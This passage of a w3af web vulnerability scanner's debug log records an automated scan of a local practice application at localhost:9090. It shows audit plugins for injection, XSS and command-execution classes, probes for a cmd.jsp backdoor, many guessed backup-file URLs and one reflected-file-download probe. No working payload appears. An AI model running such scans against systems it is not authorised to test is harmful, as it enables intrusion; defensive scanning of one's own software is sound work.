returned HTTP code "200" (id=695,from_cache=0,grep=1,rtt=0.84,did=hpKUjhw1) [Wed Feb 12 09:36:55 2020 - debug] GET http://localhost:9090/logout returned HTTP code "302" (id=697,from_cache=0,grep=0,rtt=0.09,did=wOOxq3c0) [Wed Feb 12 09:36:55 2020 - debug] ssi.audit(did="ra0pBnAz", uri="http://localhost:9090/logout") [Wed Feb 12 09:36:55 2020 - debug] xxe.audit(did="1yvgvENX", uri="http://localhost:9090/logout") [Wed Feb 12 09:36:55 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/logout" () [Wed Feb 12 09:36:55 2020 - debug] GET http://localhost:9090/logout returned HTTP code "302" (id=698,from_cache=0,grep=1,rtt=0.05,did=rdrGFmgO) [Wed Feb 12 09:36:55 2020 - debug] cors_origin.audit(did="rdrGFmgO",uri="http://localhost:9090/logout") took 0.55s to run (0.15s 26% sending HTTP requests) [Wed Feb 12 09:36:55 2020 - debug] GET http://web.archive.org/web/*/http:/localhost:9090/cmd.jsp returned HTTP code "200" (id=699,from_cache=1,grep=1,rtt=0.84,did=Y5DKYA1M) [Wed Feb 12 09:36:55 2020 - debug] Archive.org did not find any pages. [Wed Feb 12 09:36:55 2020 - debug] archive_dot_org.discover(did="WAttDmMv",uri="http://localhost:9090/cmd.jsp") took 1.49s to run [Wed Feb 12 09:36:55 2020 - debug] urllist_txt.discover(http://localhost:9090/cmd.jsp, did=hybQf0FJ) [Wed Feb 12 09:36:55 2020 - debug] [urllist_txt] Crawling "http://localhost:9090/cmd.jsp" [Wed Feb 12 09:36:55 2020 - debug] The crawl plugin: "urllist_txt" wont be run anymore. [Wed Feb 12 09:36:55 2020 - debug] Starting CrawlInfra consumer _teardown() with 0 plugins [Wed Feb 12 09:36:55 2020 - debug] Finished CrawlInfra consumer _teardown() [Wed Feb 12 09:36:55 2020 - debug] urllist_txt.discover(did="hybQf0FJ",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:36:55 2020 - debug] find_backdoors.discover(http://localhost:9090/cmd.jsp, did=JO03Jhvv) [Wed Feb 12 09:36:55 2020 - debug] [find_backdoors] Crawling "http://localhost:9090/cmd.jsp" [Wed Feb 12 09:36:55 2020 - debug] find_backdoors.discover(did="JO03Jhvv",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:36:55 2020 - debug] web_spider.discover(http://localhost:9090/cmd.jsp, did=Nj3vP0pA) [Wed Feb 12 09:36:55 2020 - debug] [web_spider] Crawling "http://localhost:9090/cmd.jsp" [Wed Feb 12 09:36:55 2020 - debug] xxe.audit(did="1yvgvENX",uri="http://localhost:9090/logout") took 0.10s to run [Wed Feb 12 09:36:55 2020 - debug] eval.audit(did="A7cugLQn", uri="http://localhost:9090/logout") [Wed Feb 12 09:36:55 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/logout" () [Wed Feb 12 09:36:55 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:A7cugLQn) [Wed Feb 12 09:36:55 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/logout" () [Wed Feb 12 09:36:55 2020 - debug] localhost:9090 connection pool stats (free:42 / in_use:8 / max:50 / total:50) [Wed Feb 12 09:36:55 2020 - debug] Connections with more in use time: (450aace75c9d8a42, 0.09 sec) (955b76b517b2a7f0, 0.09 sec) (63447e5418977032, 0.08 sec) (6b6a9da9c938112c, 0.03 sec) (f5adb0c09c70ca09, 0.03 sec) [Wed Feb 12 09:36:55 2020 - debug] rosetta_flash.audit(did="PoS7t80R", uri="http://localhost:9090/logout") [Wed Feb 12 09:36:55 2020 - debug] eval.audit(did="A7cugLQn",uri="http://localhost:9090/logout") took 0.27s to run [Wed Feb 12 09:36:55 2020 - debug] xss.audit(did="RFizPSPo", uri="http://localhost:9090/logout") [Wed Feb 12 09:36:55 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/logout" () [Wed Feb 12 09:36:55 2020 - debug] xss.audit(did="RFizPSPo",uri="http://localhost:9090/logout") took 0.00s to run [Wed Feb 12 09:36:55 2020 - debug] GET http://localhost:9090/cmd.jsp.gzip returned HTTP code "404" (id=701,from_cache=0,grep=1,rtt=0.11,did=DmG4dKK5) [Wed Feb 12 09:36:55 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 351, 'reject-seen-url': 103, 'reject-out-of-scope': 9, 'accept': 112} [Wed Feb 12 09:36:55 2020 - debug] rosetta_flash.audit(did="PoS7t80R",uri="http://localhost:9090/logout") took 0.14s to run [Wed Feb 12 09:36:55 2020 - debug] GET http://localhost:9090/cmd.jsp.rar returned HTTP code "404" (id=702,from_cache=0,grep=1,rtt=0.13,did=1TwZgSOi) [Wed Feb 12 09:36:55 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 351, 'reject-seen-url': 103, 'reject-out-of-scope': 9, 'accept': 112} [Wed Feb 12 09:36:55 2020 - debug] xst.audit(did="B4z3BrAJ", uri="http://localhost:9090/logout") [Wed Feb 12 09:36:55 2020 - debug] xst.audit(did="B4z3BrAJ",uri="http://localhost:9090/logout") took 0.00s to run [Wed Feb 12 09:36:55 2020 - debug] ssl_certificate.audit(did="NVGfGodp", uri="http://localhost:9090/logout") [Wed Feb 12 09:36:55 2020 - debug] ssl_certificate.audit(did="NVGfGodp",uri="http://localhost:9090/logout") took 0.00s to run [Wed Feb 12 09:36:55 2020 - debug] preg_replace.audit(did="nm62kAxc", uri="http://localhost:9090/logout") [Wed Feb 12 09:36:55 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/logout" () [Wed Feb 12 09:36:55 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:nm62kAxc) [Wed Feb 12 09:36:55 2020 - debug] preg_replace.audit(did="nm62kAxc",uri="http://localhost:9090/logout") took 0.08s to run [Wed Feb 12 09:36:55 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/logout" () [Wed Feb 12 09:36:55 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:ra0pBnAz) [Wed Feb 12 09:36:55 2020 - debug] GET http://localhost:9090/cmd.jsp.old returned HTTP code "404" (id=708,from_cache=0,grep=1,rtt=0.18,did=SAk4PLFh) [Wed Feb 12 09:36:55 2020 - debug] mx_injection.audit(did="RNqA5QOz", uri="http://localhost:9090/logout") [Wed Feb 12 09:36:55 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/logout" () [Wed Feb 12 09:36:55 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:RNqA5QOz) [Wed Feb 12 09:36:55 2020 - debug] GET http://localhost:9090/cmd.jsp.cab returned HTTP code "404" (id=704,from_cache=0,grep=1,rtt=0.14,did=pTzqeRH5) [Wed Feb 12 09:36:55 2020 - debug] GET http://localhost:9090/cmd.jsp.gz returned HTTP code "404" (id=703,from_cache=0,grep=1,rtt=0.10,did=w6HoHJUM) [Wed Feb 12 09:36:56 2020 - debug] GET http://localhost:9090/cmd.jsp.inc returned HTTP code "404" (id=706,from_cache=0,grep=1,rtt=0.12,did=QuWpOJDn) [Wed Feb 12 09:36:56 2020 - debug] ssi.audit(did="ra0pBnAz",uri="http://localhost:9090/logout") took 0.89s to run [Wed Feb 12 09:36:56 2020 - debug] response_splitting.audit(did="iZMe3jgp", uri="http://localhost:9090/logout") [Wed Feb 12 09:36:56 2020 - debug] GET http://localhost:9090/cmd.jsp.backup returned HTTP code "404" (id=707,from_cache=0,grep=1,rtt=0.21,did=MaWZLpRa) [Wed Feb 12 09:36:56 2020 - debug] mx_injection.audit(did="RNqA5QOz",uri="http://localhost:9090/logout") took 0.07s to run [Wed Feb 12 09:36:56 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/logout" () [Wed Feb 12 09:36:56 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:iZMe3jgp) [Wed Feb 12 09:36:56 2020 - debug] GET http://localhost:9090/cmd.jsp.java returned HTTP code "404" (id=705,from_cache=0,grep=1,rtt=0.06,did=dyTXfrX6) [Wed Feb 12 09:36:56 2020 - debug] rfd.audit(did="mkW2BEi0", uri="http://localhost:9090/logout") [Wed Feb 12 09:36:56 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/logout%3B/w3af.cmd%3B/w3af.cmd" () [Wed Feb 12 09:36:56 2020 - debug] rfd.audit(did="mkW2BEi0",uri="http://localhost:9090/logout") took 0.00s to run [Wed Feb 12 09:36:56 2020 - debug] GET http://localhost:9090/cmd.tar.gz returned HTTP code "404" (id=711,from_cache=0,grep=1,rtt=0.14,did=t0WKRFZZ) [Wed Feb 12 09:36:56 2020 - debug] GET http://localhost:9090/cmd.jsp.jar returned HTTP code "404" (id=712,from_cache=0,grep=1,rtt=0.15,did=kRpVBXSC) [Wed Feb 12 09:36:56 2020 - debug] GET http://localhost:9090/cmd.jsp.tar.gz returned HTTP code "404" (id=715,from_cache=0,grep=1,rtt=0.34,did=Y1nu2dET) [Wed Feb 12 09:36:56 2020 - debug] GET http://localhost:9090/cmd.7z returned HTTP code "404" (id=716,from_cache=0,grep=1,rtt=0.14,did=95X6Uoo7) [Wed Feb 12 09:36:57 2020 - debug] GET http://localhost:9090/cmd.tgz returned HTTP code "404" (id=718,from_cache=0,grep=1,rtt=0.12,did=ulP1oEPn) [Wed Feb 12 09:36:57 2020 - debug] GET http://localhost:9090/cmd.jsp.old1 returned HTTP code "404" (id=721,from_cache=0,grep=1,rtt=0.30,did=DIJcjTgs) [Wed Feb 12 09:36:57 2020 - debug] GET http://localhost:9090/cmd.jsp.$$$ returned HTTP code "404" (id=723,from_cache=0,grep=1,rtt=0.10,did=W3YfY1ao) [Wed Feb 12 09:36:57 2020 - debug] GET http://localhost:9090/cmd.jsp.bak1 returned HTTP code "404" (id=725,from_cache=0,grep=1,rtt=0.21,did=K9ZHq9Ij) [Wed Feb 12 09:36:57 2020 - debug] GET http://localhost:9090/cmd.jsp.bzip2 returned HTTP code "404" (id=727,from_cache=0,grep=1,rtt=0.24,did=tn1iyoxi) [Wed Feb 12 09:36:57 2020 - debug] GET http://localhost:9090/cmd.jsp.7z returned HTTP code "404" (id=729,from_cache=0,grep=1,rtt=0.15,did=bMsKdNH1) [Wed Feb 12 09:36:57 2020 - debug] GET http://localhost:9090/cmd.jsp.bak returned HTTP code "404" (id=709,from_cache=0,grep=1,rtt=0.20,did=JzN8wCEW) [Wed Feb 12 09:36:57 2020 - debug] GET http://www.bing.com/search?q=@localhost.&FORM=PERE&first=171 returned HTTP code "200" (id=720,from_cache=0,grep=0,rtt=0.66,did=bO2QPfix) [Wed Feb 12 09:36:57 2020 - debug] rfi.audit(did="tBAmetPI", uri="http://localhost:9090/logout") [Wed Feb 12 09:36:57 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/logout" () [Wed Feb 12 09:36:57 2020 - debug] response_splitting.audit(did="iZMe3jgp",uri="http://localhost:9090/logout") took 0.19s to run [Wed Feb 12 09:36:57 2020 - debug] GET http://localhost:9090/cmd.jsp.backup1 returned HTTP code "404" (id=722,from_cache=0,grep=1,rtt=0.12,did=8ltq8Zzf) [Wed Feb 12 09:36:58 2020 - debug] GET http://localhost:9090/cmd.jsp.back returned HTTP code "404" (id=728,from_cache=0,grep=1,rtt=0.23,did=EYcdsboh) [Wed Feb 12 09:36:58 2020 - debug] GET http://localhost:9090/cmd.jsp.class returned HTTP code "404" (id=713,from_cache=0,grep=1,rtt=0.26,did=ARx7nIGj) [Wed Feb 12 09:36:58 2020 - debug] GET http://localhost:9090/cmd.jsp~ returned HTTP code "404" (id=717,from_cache=0,grep=1,rtt=0.36,did=5BBnZ5Ne) [Wed Feb 12 09:36:58 2020 - debug] frontpage.audit(did="EIhKNkj1", uri="http://localhost:9090/logout") [Wed Feb 12 09:36:58 2020 - debug] GET http://localhost:9090/cmd.cab returned HTTP code "404" (id=724,from_cache=0,grep=1,rtt=0.15,did=WTu5VyRa) [Wed Feb 12 09:36:58 2020 - debug] GET http://localhost:9090/cmd.jsp.properties returned HTTP code "404" (id=710,from_cache=0,grep=1,rtt=0.22,did=3yZYaHcC) [Wed Feb 12 09:36:58 2020 - debug] GET http://localhost:9090/cmd.jsp.zip returned HTTP code "404" (id=714,from_cache=0,grep=1,rtt=0.40,did=aWZKzMbJ) [Wed Feb 12 09:36:58 2020 - debug] GET http://localhost:9090/cmd.jsp.tgz returned HTTP code "404" (id=719,from_cache=0,grep=1,rtt=0.30,did=grGQZdUN) [Wed Feb 12 09:36:58 2020 - debug] GET http://localhost:9090/cmd.gz returned HTTP code "404" (id=730,from_cache=0,grep=1,rtt=0.30,did=6Ek9DOjY) [Wed Feb 12 09:36:58 2020 - debug] GET http://localhost:9090/cmd.jsp.bkp returned HTTP code "404" (id=726,from_cache=0,grep=1,rtt=0.28,did=PLIhwk2A) [Wed Feb 12 09:36:58 2020 - debug] GET http://localhost:9090/cmd.bzip2 returned HTTP code "404" (id=732,from_cache=0,grep=1,rtt=0.08,did=HYwS4MS3) [Wed Feb 12 09:36:58 2020 - debug] localhost:9090 connection pool stats (free:49 / in_use:3 / max:50 / total:52) [Wed Feb 12 09:36:58 2020 - debug] Connections with more in use time: (a5419411797e137e, 0.44 sec) (450aace75c9d8a42, 0.44 sec) (955b76b517b2a7f0, 0.42 sec) [Wed Feb 12 09:36:58 2020 - debug] GET http://localhost:9090/cmd.jsp returned HTTP code "404" (id=731,from_cache=1,grep=1,rtt=0.11,did=LIdG72Yx) [Wed Feb 12 09:36:58 2020 - debug] web_spider.discover(did="Nj3vP0pA",uri="http://localhost:9090/cmd.jsp") took 1.49s to run [Wed Feb 12 09:36:58 2020 - debug] frontpage.audit(did="EIhKNkj1",uri="http://localhost:9090/logout") took 0.49s to run [Wed Feb 12 09:36:58 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:tBAmetPI) [Wed Feb 12 09:36:58 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.00 seconds [Wed Feb 12 09:36:58 2020 - debug] RFI using local web server for URL: http://localhost:9090/logout [Wed Feb 12 09:36:58 2020 - debug] GET http://localhost:9090/learn/vulnerability/ax_csrf returned HTTP code "302" (id=734,from_cache=0,grep=0,rtt=0.46,did=D12ul1Ud) [Wed Feb 12 09:36:58 2020 - debug] file_upload.audit(did="vvpFsNrw", uri="http://localhost:9090/learn/vulnerability/ax_csrf") [Wed Feb 12 09:36:58 2020 - debug] file_upload.audit(did="vvpFsNrw",uri="http://localhost:9090/learn/vulnerability/ax_csrf") took 0.00s to run [Wed Feb 12 09:36:59 2020 - debug] GET http://localhost:9090/cmd.rar returned HTTP code "404" (id=735,from_cache=0,grep=1,rtt=0.47,did=cXVMdomw) [Wed Feb 12 09:36:59 2020 - debug] find_captchas.discover(http://localhost:9090/cmd.jsp, did=aI2rv3vj) [Wed Feb 12 09:36:59 2020 - debug] [find_captchas] Crawling "http://localhost:9090/cmd.jsp" [Wed Feb 12 09:36:59 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/logout" () [Wed Feb 12 09:36:59 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:tBAmetPI) [Wed Feb 12 09:36:59 2020 - debug] GET http://localhost:9090/cmd.fla returned HTTP code "404" (id=736,from_cache=0,grep=1,rtt=0.09,did=iVKhowvL) [Wed Feb 12 09:36:59 2020 - debug] rfi.audit(did="tBAmetPI",uri="http://localhost:9090/logout") took 0.79s to run [Wed Feb 12 09:36:59 2020 - debug] GET http://localhost:9090/cmd.gzip returned HTTP code "404" (id=740,from_cache=0,grep=1,rtt=0.43,did=5Vcqj2TM) [Wed Feb 12 09:36:59 2020 - debug] csrf.audit(did="8gOiPbMU", uri="http://localhost:9090/learn/vulnerability/ax_csrf") [Wed Feb 12 09:36:59 2020 - debug] csrf.audit(did="8gOiPbMU",uri="http://localhost:9090/learn/vulnerability/ax_csrf") took 0.00s to run [Wed Feb 12 09:36:59 2020 - debug] GET http://localhost:9090/cmd.java returned HTTP code "404" (id=738,from_cache=0,grep=1,rtt=0.05,did=vrAZ4nRG) [Wed Feb 12 09:36:59 2020 - debug] GET http://localhost:9090/cmd.class returned HTTP code "404" (id=741,from_cache=0,grep=1,rtt=0.05,did=4KY7cjJL) [Wed Feb 12 09:36:59 2020 - debug] GET http://localhost:9090/cmd.zip returned HTTP code "404" (id=733,from_cache=0,grep=1,rtt=0.44,did=vRcmkUwM) [Wed Feb 12 09:36:59 2020 - debug] localhost:9090 connection pool stats (free:41 / in_use:11 / max:50 / total:52) [Wed Feb 12 09:36:59 2020 - debug] Connections with more in use time: (f5adb0c09c70ca09, 0.28 sec) (450aace75c9d8a42, 0.26 sec) (955b76b517b2a7f0, 0.17 sec) (a5419411797e137e, 0.07 sec) (63447e5418977032, 0.07 sec) [Wed Feb 12 09:36:59 2020 - debug] deserialization.audit(did="KWhtDTDg", uri="http://localhost:9090/learn/vulnerability/ax_csrf") [Wed Feb 12 09:36:59 2020 - debug] GET http://localhost:9090/cmd.c returned HTTP code "404" (id=743,from_cache=0,grep=1,rtt=0.05,did=ZIcoRc7U) [Wed Feb 12 09:36:59 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/ax_csrf" () [Wed Feb 12 09:37:00 2020 - debug] GET http://localhost:9090/cmd.inc returned HTTP code "404" (id=739,from_cache=0,grep=1,rtt=0.16,did=2rnzVgyk) [Wed Feb 12 09:37:00 2020 - debug] GET http://localhost:9090/cmd.backup1 returned HTTP code "404" (id=742,from_cache=0,grep=1,rtt=0.11,did=DvvCi47N) [Wed Feb 12 09:37:00 2020 - debug] GET http://localhost:9090/cmd.jar returned HTTP code "404" (id=737,from_cache=0,grep=1,rtt=0.12,did=9OBv5xqU) [Wed Feb 12 09:37:00 2020 - debug] GET http://localhost:9090/cmd.old1 returned HTTP code "404" (id=749,from_cache=0,grep=1,rtt=0.41,did=3Lk4WFke) [Wed Feb 12 09:37:00 2020 - debug] GET http://localhost:9090/cmd.orig returned HTTP code "404" (id=753,from_cache=0,grep=1,rtt=0.29,did=huKAHysU) [Wed Feb 12 09:37:00 2020 - debug] deserialization.audit(did="KWhtDTDg",uri="http://localhost:9090/learn/vulnerability/ax_csrf") took 0.30s to run [Wed Feb 12 09:37:00 2020 - debug] GET http://localhost:9090/localhost.gz returned HTTP code "404" (id=748,from_cache=0,grep=1,rtt=0.16,did=ImigIYBM) [Wed Feb 12 09:37:00 2020 - debug] os_commanding.audit(did="RzNG6Fv5", uri="http://localhost:9090/learn/vulnerability/ax_csrf") [Wed Feb 12 09:37:00 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/ax_csrf" () [Wed Feb 12 09:37:00 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/ax_csrf" () [Wed Feb 12 09:37:00 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:RzNG6Fv5) [Wed Feb 12 09:37:01 2020 - debug] GET http://localhost:9090/cmd.war returned HTTP code "404" (id=758,from_cache=0,grep=1,rtt=0.40,did=pSOy0SY0) [Wed Feb 12 09:37:01 2020 - debug] GET http://localhost:9090/localhost.cab returned HTTP code "404" (id=746,from_cache=0,grep=1,rtt=0.05,did=ie9as32s) [Wed Feb 12 09:37:01 2020 - debug] GET http://localhost:9090/cmd.phps returned HTTP code "404" (id=745,from_cache=0,grep=1,rtt=0.10,did=LZ5jYSg0) [Wed Feb 12 09:37:01 2020 - debug] GET http://localhost:9090/cmd.ori returned HTTP code "404" (id=747,from_cache=0,grep=1,rtt=0.06,did=gQE4CLox) [Wed Feb 12 09:37:01 2020 - debug] GET http://localhost:9090/cmd.vb returned HTTP code "404" (id=744,from_cache=0,grep=1,rtt=0.10,did=3jBenzab) [Wed Feb 12 09:37:01 2020 - debug] GET http://localhost:9090/localhost.7z returned HTTP code "404" (id=750,from_cache=0,grep=1,rtt=0.04,did=y37Qfa8t) [Wed Feb 12 09:37:01 2020 - debug] GET http://localhost:9090/cmd.old returned HTTP code "404" (id=755,from_cache=0,grep=1,rtt=0.55,did=FF2t33aj) [Wed Feb 12 09:37:01 2020 - debug] GET http://localhost:9090/cmd.disco returned HTTP code "404" (id=756,from_cache=0,grep=1,rtt=0.31,did=6Imy2jYd) [Wed Feb 12 09:37:01 2020 - debug] GET http://localhost:9090/cmd.backup returned HTTP code "404" (id=759,from_cache=0,grep=1,rtt=0.05,did=kNNUPIsK) [Wed Feb 12 09:37:01 2020 - debug] GET http://localhost:9090/cmd.bak1 returned HTTP code "404" (id=754,from_cache=0,grep=1,rtt=0.16,did=utNjXath) [Wed Feb 12 09:37:01 2020 - debug] GET http://localhost:9090/cmd.properties returned HTTP code "404" (id=752,from_cache=0,grep=1,rtt=0.25,did=GsV7CI3B) [Wed Feb 12 09:37:02 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 79. [Wed Feb 12 09:37:02 2020 - debug] GET http://localhost:9090/cmd.cpp returned HTTP code "404" (id=757,from_cache=0,grep=1,rtt=0.40,did=okQBdGOM) [Wed Feb 12 09:37:02 2020 - debug] GET http://localhost:9090/localhost.tgz returned HTTP code "404" (id=760,from_cache=0,grep=1,rtt=0.08,did=sBPUUyXg) [Wed Feb 12 09:37:02 2020 - debug] GET http://localhost:9090/cmd.jsp returned HTTP code "404" (id=751,from_cache=0,grep=1,rtt=0.35,did=2Ibpsb8Q) [Wed Feb 12 09:37:02 2020 - debug] lfi.audit(did="U2hIItLa", uri="http://localhost:9090/learn/vulnerability/ax_csrf") [Wed Feb 12 09:37:02 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/ax_csrf" () [Wed Feb 12 09:37:02 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:U2hIItLa) [Wed Feb 12 09:37:02 2020 - debug] GET http://localhost:9090/cmd.cs returned HTTP code "404" (id=761,from_cache=0,grep=1,rtt=0.21,did=73ldAeK1) [Wed Feb 12 09:37:02 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/ax_csrf" () [Wed Feb 12 09:37:02 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/ax_csrf" () [Wed Feb 12 09:37:02 2020 - debug] lfi.audit(did="U2hIItLa",uri="http://localhost:9090/learn/vulnerability/ax_csrf") took 0.11s to run [Wed Feb 12 09:37:02 2020 - debug] sqli.audit(did="zjJYeszK", uri="http://localhost:9090/learn/vulnerability/ax_csrf") [Wed Feb 12 09:37:02 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/ax_csrf" () [Wed Feb 12 09:37:02 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:zjJYeszK) [Wed Feb 12 09:37:02 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 80. [Wed Feb 12 09:37:02 2020 - debug] blind_sqli.audit(did="0XWAVibD", uri="http://localhost:9090/learn/vulnerability/ax_csrf") [Wed Feb 12 09:37:02 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/ax_csrf" () [Wed Feb 12 09:37:02 2020 - debug] os_commanding.audit(did="RzNG6Fv5",uri="http://localhost:9090/learn/vulnerability/ax_csrf") took 0.51s to run [Wed Feb 12 09:37:02 2020 - debug] phishing_vector.audit(did="bnV9jLaF", uri="http://localhost:9090/learn/vulnerability/ax_csrf") [Wed Feb 12 09:37:02 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/ax_csrf" () [Wed Feb 12 09:37:02 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:bnV9jLaF) [Wed Feb 12 09:37:02 2020 - debug] Finished audit.phishing_vector (did=bnV9jLaF) [Wed Feb 12 09:37:02 2020 - debug] phishing_vector.audit(did="bnV9jLaF",uri="http://localhost:9090/learn/vulnerability/ax_csrf") took 0.00s to run [Wed Feb 12 09:37:02 2020 - debug] GET http://localhost:9090/localhost.tar.gz returned HTTP code "404" (id=763,from_cache=0,grep=1,rtt=0.35,did=2s5v1HUA) [Wed Feb 12 09:37:02 2020 - debug] GET http://localhost:9090/cmd.bak returned HTTP code "404" (id=762,from_cache=0,grep=1,rtt=0.44,did=kS2xJLVe) [Wed Feb 12 09:37:02 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/ax_csrf" () [Wed Feb 12 09:37:02 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 81. [Wed Feb 12 09:37:02 2020 - debug] GET http://localhost:9090/localhost.gzip returned HTTP code "404" (id=764,from_cache=0,grep=1,rtt=0.08,did=3Y3WM5GO) [Wed Feb 12 09:37:02 2020 - debug] GET http://localhost:9090/cmd.original returned HTTP code "404" (id=765,from_cache=0,grep=1,rtt=0.30,did=4srvywby) [Wed Feb 12 09:37:02 2020 - debug] generic.audit(did="GwmXphqg", uri="http://localhost:9090/learn/vulnerability/ax_csrf") [Wed Feb 12 09:37:02 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/ax_csrf" () [Wed Feb 12 09:37:02 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 82. [Wed Feb 12 09:37:02 2020 - debug] sqli.audit(did="zjJYeszK",uri="http://localhost:9090/learn/vulnerability/ax_csrf") took 0.02s to run [Wed Feb 12 09:37:02 2020 - debug] generic.audit(did="GwmXphqg",uri="http://localhost:9090/learn/vulnerability/ax_csrf") took 0.00s to run [Wed Feb 12 09:37:02 2020 - debug] blind_sqli.audit(did="0XWAVibD",uri="http://localhost:9090/learn/vulnerability/ax_csrf") took 0.11s to run [Wed Feb 12 09:37:02 2020 - debug] format_string.audit(did="CWV6c6Mj", uri="http://localhost:9090/learn/vulnerability/ax_csrf") [Wed Feb 12 09:37:02 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/ax_csrf" () [Wed Feb 12 09:37:02 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:CWV6c6Mj) [Wed Feb 12 09:37:03 2020 - debug] format_string.audit(did="CWV6c6Mj",uri="http://localhost:9090/learn/vulnerability/ax_csrf") took 0.00s to run [Wed Feb 12 09:37:03 2020 - debug] GET http://localhost:9090/localhost.zip returned HTTP code "404" (id=767,from_cache=0,grep=1,rtt=0.15,did=2de3vtJo) [Wed Feb 12 09:37:03 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 83. [Wed Feb 12 09:37:03 2020 - debug] GET http://localhost:9090/localhost.bzip2 returned HTTP code "404" (id=766,from_cache=0,grep=1,rtt=0.02,did=wkwk2R4J) [Wed Feb 12 09:37:03 2020 - debug] GET http://www.bing.com/search?q=@localhost.&FORM=PERE&first=181 returned HTTP code "200" (id=768,from_cache=0,grep=0,rtt=1.12,did=TEoNj1YF) [Wed Feb 12 09:37:03 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 84. [Wed Feb 12 09:37:03 2020 - debug] websocket_hijacking.audit(did="5oWZocM5", uri="http://localhost:9090/learn/vulnerability/ax_csrf") [Wed Feb 12 09:37:03 2020 - debug] shell_shock.audit(did="a5xU0q8J", uri="http://localhost:9090/learn/vulnerability/ax_csrf") [Wed Feb 12 09:37:03 2020 - debug] websocket_hijacking.audit(did="5oWZocM5",uri="http://localhost:9090/learn/vulnerability/ax_csrf") took 0.01s to run [Wed Feb 12 09:37:03 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 85. [Wed Feb 12 09:37:03 2020 - debug] memcachei.audit(did="BAcplORZ", uri="http://localhost:9090/learn/vulnerability/ax_csrf") [Wed Feb 12 09:37:03 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/ax_csrf" () [Wed Feb 12 09:37:03 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:BAcplORZ) [Wed Feb 12 09:37:03 2020 - debug] memcachei.audit(did="BAcplORZ",uri="http://localhost:9090/learn/vulnerability/ax_csrf") took 0.00s to run [Wed Feb 12 09:37:03 2020 - debug] GET http://localhost:9090/localhost.rar returned HTTP code "404" (id=769,from_cache=0,grep=1,rtt=0.11,did=JNAkfJVT) [Wed Feb 12 09:37:03 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 86. [Wed Feb 12 09:37:03 2020 - debug] un_ssl.audit(did="cMcFpfBr", uri="http://localhost:9090/learn/vulnerability/ax_csrf") [Wed Feb 12 09:37:03 2020 - debug] un_ssl.audit(did="cMcFpfBr",uri="http://localhost:9090/learn/vulnerability/ax_csrf") took 0.00s to run [Wed Feb 12 09:37:03 2020 - debug] ldapi.audit(did="vH2unDri", uri="http://localhost:9090/learn/vulnerability/ax_csrf") [Wed Feb 12 09:37:03 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/learn/vulnerability/ax_csrf" () [Wed Feb 12 09:37:03 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:vH2unDri) [Wed Feb 12 09:37:03 2020 - debug] 